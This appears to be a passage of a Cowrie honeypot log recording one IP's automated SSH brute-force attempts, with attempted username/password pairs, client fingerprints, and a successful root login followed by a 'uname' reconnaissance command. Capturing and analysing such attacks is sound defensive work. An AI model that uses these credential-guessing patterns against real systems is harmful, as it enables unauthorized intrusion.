sa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:09:38.150290Z","src_ip":"212.227.125.160","session":"73d6a8764100"}
{"eventid":"cowrie.login.failed","username":"titu","password":"titu","message":"login attempt [titu/titu] failed","sensor":"my-vps","timestamp":"2025-08-26T22:09:38.640477Z","src_ip":"212.227.125.160","session":"73d6a8764100"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:09:39.701554Z","src_ip":"212.227.125.160","session":"73d6a8764100"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33866,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f4fb6c6de3c","protocol":"ssh","message":"New connection: 212.227.125.160:33866 (1.2.3.4:22) [session: 1f4fb6c6de3c]","sensor":"my-vps","timestamp":"2025-08-26T22:09:43.648100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:09:43.649274Z","src_ip":"212.227.125.160","session":"1f4fb6c6de3c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:09:43.704437Z","src_ip":"212.227.125.160","session":"1f4fb6c6de3c"}
{"eventid":"cowrie.login.failed","username":"priyanka","password":"priyanka","message":"login attempt [priyanka/priyanka] failed","sensor":"my-vps","timestamp":"2025-08-26T22:09:43.907176Z","src_ip":"212.227.125.160","session":"1f4fb6c6de3c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:09:45.003474Z","src_ip":"212.227.125.160","session":"1f4fb6c6de3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57484,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc7b390768fd","protocol":"ssh","message":"New connection: 212.227.125.160:57484 (1.2.3.4:22) [session: bc7b390768fd]","sensor":"my-vps","timestamp":"2025-08-26T22:09:49.541017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:09:49.542753Z","src_ip":"212.227.125.160","session":"bc7b390768fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:09:49.587813Z","src_ip":"212.227.125.160","session":"bc7b390768fd"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-26T22:09:49.777331Z","src_ip":"212.227.125.160","session":"bc7b390768fd"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:09:50.824223Z","src_ip":"212.227.125.160","session":"bc7b390768fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52868,"dst_ip":"1.2.3.4","dst_port":22,"session":"693574ec84cd","protocol":"ssh","message":"New connection: 212.227.125.160:52868 (1.2.3.4:22) [session: 693574ec84cd]","sensor":"my-vps","timestamp":"2025-08-26T22:09:54.959467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:09:54.961000Z","src_ip":"212.227.125.160","session":"693574ec84cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:09:55.033200Z","src_ip":"212.227.125.160","session":"693574ec84cd"}
{"eventid":"cowrie.login.failed","username":"shutdown","password":"shutdown","message":"login attempt [shutdown/shutdown] failed","sensor":"my-vps","timestamp":"2025-08-26T22:09:56.496959Z","src_ip":"212.227.125.160","session":"693574ec84cd"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:09:57.548280Z","src_ip":"212.227.125.160","session":"693574ec84cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48258,"dst_ip":"1.2.3.4","dst_port":22,"session":"951409274a27","protocol":"ssh","message":"New connection: 212.227.125.160:48258 (1.2.3.4:22) [session: 951409274a27]","sensor":"my-vps","timestamp":"2025-08-26T22:10:00.869552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:00.870575Z","src_ip":"212.227.125.160","session":"951409274a27"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:00.914738Z","src_ip":"212.227.125.160","session":"951409274a27"}
{"eventid":"cowrie.login.failed","username":"system","password":"system","message":"login attempt [system/system] failed","sensor":"my-vps","timestamp":"2025-08-26T22:10:01.053565Z","src_ip":"212.227.125.160","session":"951409274a27"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:02.282088Z","src_ip":"212.227.125.160","session":"951409274a27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37172,"dst_ip":"1.2.3.4","dst_port":23,"session":"a0be016475de","protocol":"telnet","message":"New connection: 212.227.125.160:37172 (1.2.3.4:23) [session: a0be016475de]","sensor":"my-vps","timestamp":"2025-08-26T22:10:04.455751Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43644,"dst_ip":"1.2.3.4","dst_port":22,"session":"071e158b64eb","protocol":"ssh","message":"New connection: 212.227.125.160:43644 (1.2.3.4:22) [session: 071e158b64eb]","sensor":"my-vps","timestamp":"2025-08-26T22:10:06.422982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:06.424176Z","src_ip":"212.227.125.160","session":"071e158b64eb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:06.468160Z","src_ip":"212.227.125.160","session":"071e158b64eb"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"daemon","message":"login attempt [daemon/daemon] failed","sensor":"my-vps","timestamp":"2025-08-26T22:10:06.603909Z","src_ip":"212.227.125.160","session":"071e158b64eb"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:07.664307Z","src_ip":"212.227.125.160","session":"071e158b64eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39026,"dst_ip":"1.2.3.4","dst_port":22,"session":"65704a14e4f6","protocol":"ssh","message":"New connection: 212.227.125.160:39026 (1.2.3.4:22) [session: 65704a14e4f6]","sensor":"my-vps","timestamp":"2025-08-26T22:10:11.793087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:11.803038Z","src_ip":"212.227.125.160","session":"65704a14e4f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:11.843091Z","src_ip":"212.227.125.160","session":"65704a14e4f6"}
{"eventid":"cowrie.login.failed","username":"odoo17","password":"odoo17","message":"login attempt [odoo17/odoo17] failed","sensor":"my-vps","timestamp":"2025-08-26T22:10:12.059011Z","src_ip":"212.227.125.160","session":"65704a14e4f6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:13.121067Z","src_ip":"212.227.125.160","session":"65704a14e4f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34416,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cd1dd11fcd1","protocol":"ssh","message":"New connection: 212.227.125.160:34416 (1.2.3.4:22) [session: 1cd1dd11fcd1]","sensor":"my-vps","timestamp":"2025-08-26T22:10:17.733009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:17.754406Z","src_ip":"212.227.125.160","session":"1cd1dd11fcd1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:17.794137Z","src_ip":"212.227.125.160","session":"1cd1dd11fcd1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:10:18.060972Z","src_ip":"212.227.125.160","session":"1cd1dd11fcd1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:19.131614Z","src_ip":"212.227.125.160","session":"1cd1dd11fcd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58018,"dst_ip":"1.2.3.4","dst_port":22,"session":"9356fc6ed8ca","protocol":"ssh","message":"New connection: 212.227.125.160:58018 (1.2.3.4:22) [session: 9356fc6ed8ca]","sensor":"my-vps","timestamp":"2025-08-26T22:10:23.603992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:23.704719Z","src_ip":"212.227.125.160","session":"9356fc6ed8ca"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:23.705719Z","src_ip":"212.227.125.160","session":"9356fc6ed8ca"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:10:24.001529Z","src_ip":"212.227.125.160","session":"9356fc6ed8ca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:10:24.113197Z","src_ip":"212.227.125.160","session":"9356fc6ed8ca"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:10:24.113970Z","src_ip":"212.227.125.160","session":"9356fc6ed8ca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:24.159304Z","src_ip":"212.227.125.160","session":"9356fc6ed8ca"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:24.160383Z","src_ip":"212.227.125.160","session":"9356fc6ed8ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53422,"dst_ip":"1.2.3.4","dst_port":22,"session":"800e5eceaa9a","protocol":"ssh","message":"New connection: 212.227.125.160:53422 (1.2.3.4:22) [session: 800e5eceaa9a]","sensor":"my-vps","timestamp":"2025-08-26T22:10:29.260622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:10:29.290706Z","src_ip":"212.227.125.160","session":"800e5eceaa9a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:10:29.356260Z","src_ip":"212.227.125.160","session":"800e5eceaa9a"}
{"eventid":"cowrie.login.failed","username":"default","password":"default","message":"login attempt [default/default] failed","sensor":"my-vps","timestamp":"2025-08-26T22:10:29.643362Z","src_ip":"212.227.125.160","session":"800e5eceaa9a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:10:30.794655Z","src_ip":"212.227.125.160","session":"800e5eceaa9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48814,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fd51aaf7918","protocol":"ssh","message":"New connection: 212.227.125.160:48814 (1.2.3.4:22) [session: 3fd51aaf7918]","sensor":"my-vps","timestamp":"2025-08-26T22:10:35.020105Z"}
